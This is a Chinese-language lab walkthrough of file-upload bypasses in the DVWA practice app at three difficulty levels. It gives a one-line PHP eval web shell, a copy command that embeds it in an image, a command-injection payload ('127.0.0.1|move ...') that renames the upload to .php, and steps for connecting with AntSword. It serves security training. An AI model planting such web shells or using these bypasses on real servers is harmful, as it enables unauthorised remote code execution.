目录
2.2、上传文件,打开burpSuite,抓上传的包,修改后缀名为php,放行
3.3、生成木马图片:cmd进入图片文件夹所在路径,执行生成木马图片命令
[3.4、上传文件 ,成功后复制路径](#3.4、上传文件 ,成功后复制路径)
[3.5、在Command Injection板块命令执行:修改木马图片为可行性木马文件](#3.5、在Command Injection板块命令执行:修改木马图片为可行性木马文件)
3.6、访问修改后的,就是修改后的路径:你的dvwa路径拼接上这个文件路径,回车就自动成功那个路径

一、low级别,直接上传木马文件
1.1、准备一个木马文件

1.2、直接上传木马文件

1.3、访问木马链接

1.4、连接蚁剑


二、medium级别:抓包文件缀名
2.1、准备一个木马文件,修改后缀名为图片的后缀名


2.2、上传文件,打开burpSuite,抓上传的包,修改后缀名为php,放行



2.3、访问木马文件链接

2.4、连接蚁剑


三、high级别:木马图片,命令执行修改为木马文件
3.1、准备一个真实小图片,命名自定义,以下是示例

3.2、准备一个木马文件
<?php @eval($_POST['pass']);?>

3.3、生成木马图片:cmd进入图片文件夹所在路径,执行生成木马图片命令
copy 真实图片.后缀名/b+木马文件.后缀名 木马图片.真实图片后缀名

3.4、上传文件 ,成功后复制路径

3.5、在Command Injection板块命令执行:修改木马图片为可行性木马文件
127.0.0.1|move ../../hackable/uploads/你的木马图片 ../../hackable/uploads/修改后的木马文件
例如我的:127.0.0.1|move ../../hackable/uploads/mua.jpg ../../hackable/uploads/mua.php
3.6、访问修改后的,就是修改后的路径:你的dvwa路径拼接上这个文件路径,回车就自动成功那个路径
http://127.0.0.1/dvwa/vulnerabilities/exec/../../hackable/uploads/mua.php直接回车,变成下方的木马文件链接
http://127.0.0.1/dvwa/hackable/uploads/mua.php
3.7、蚁剑连接:木马链接和木马密码

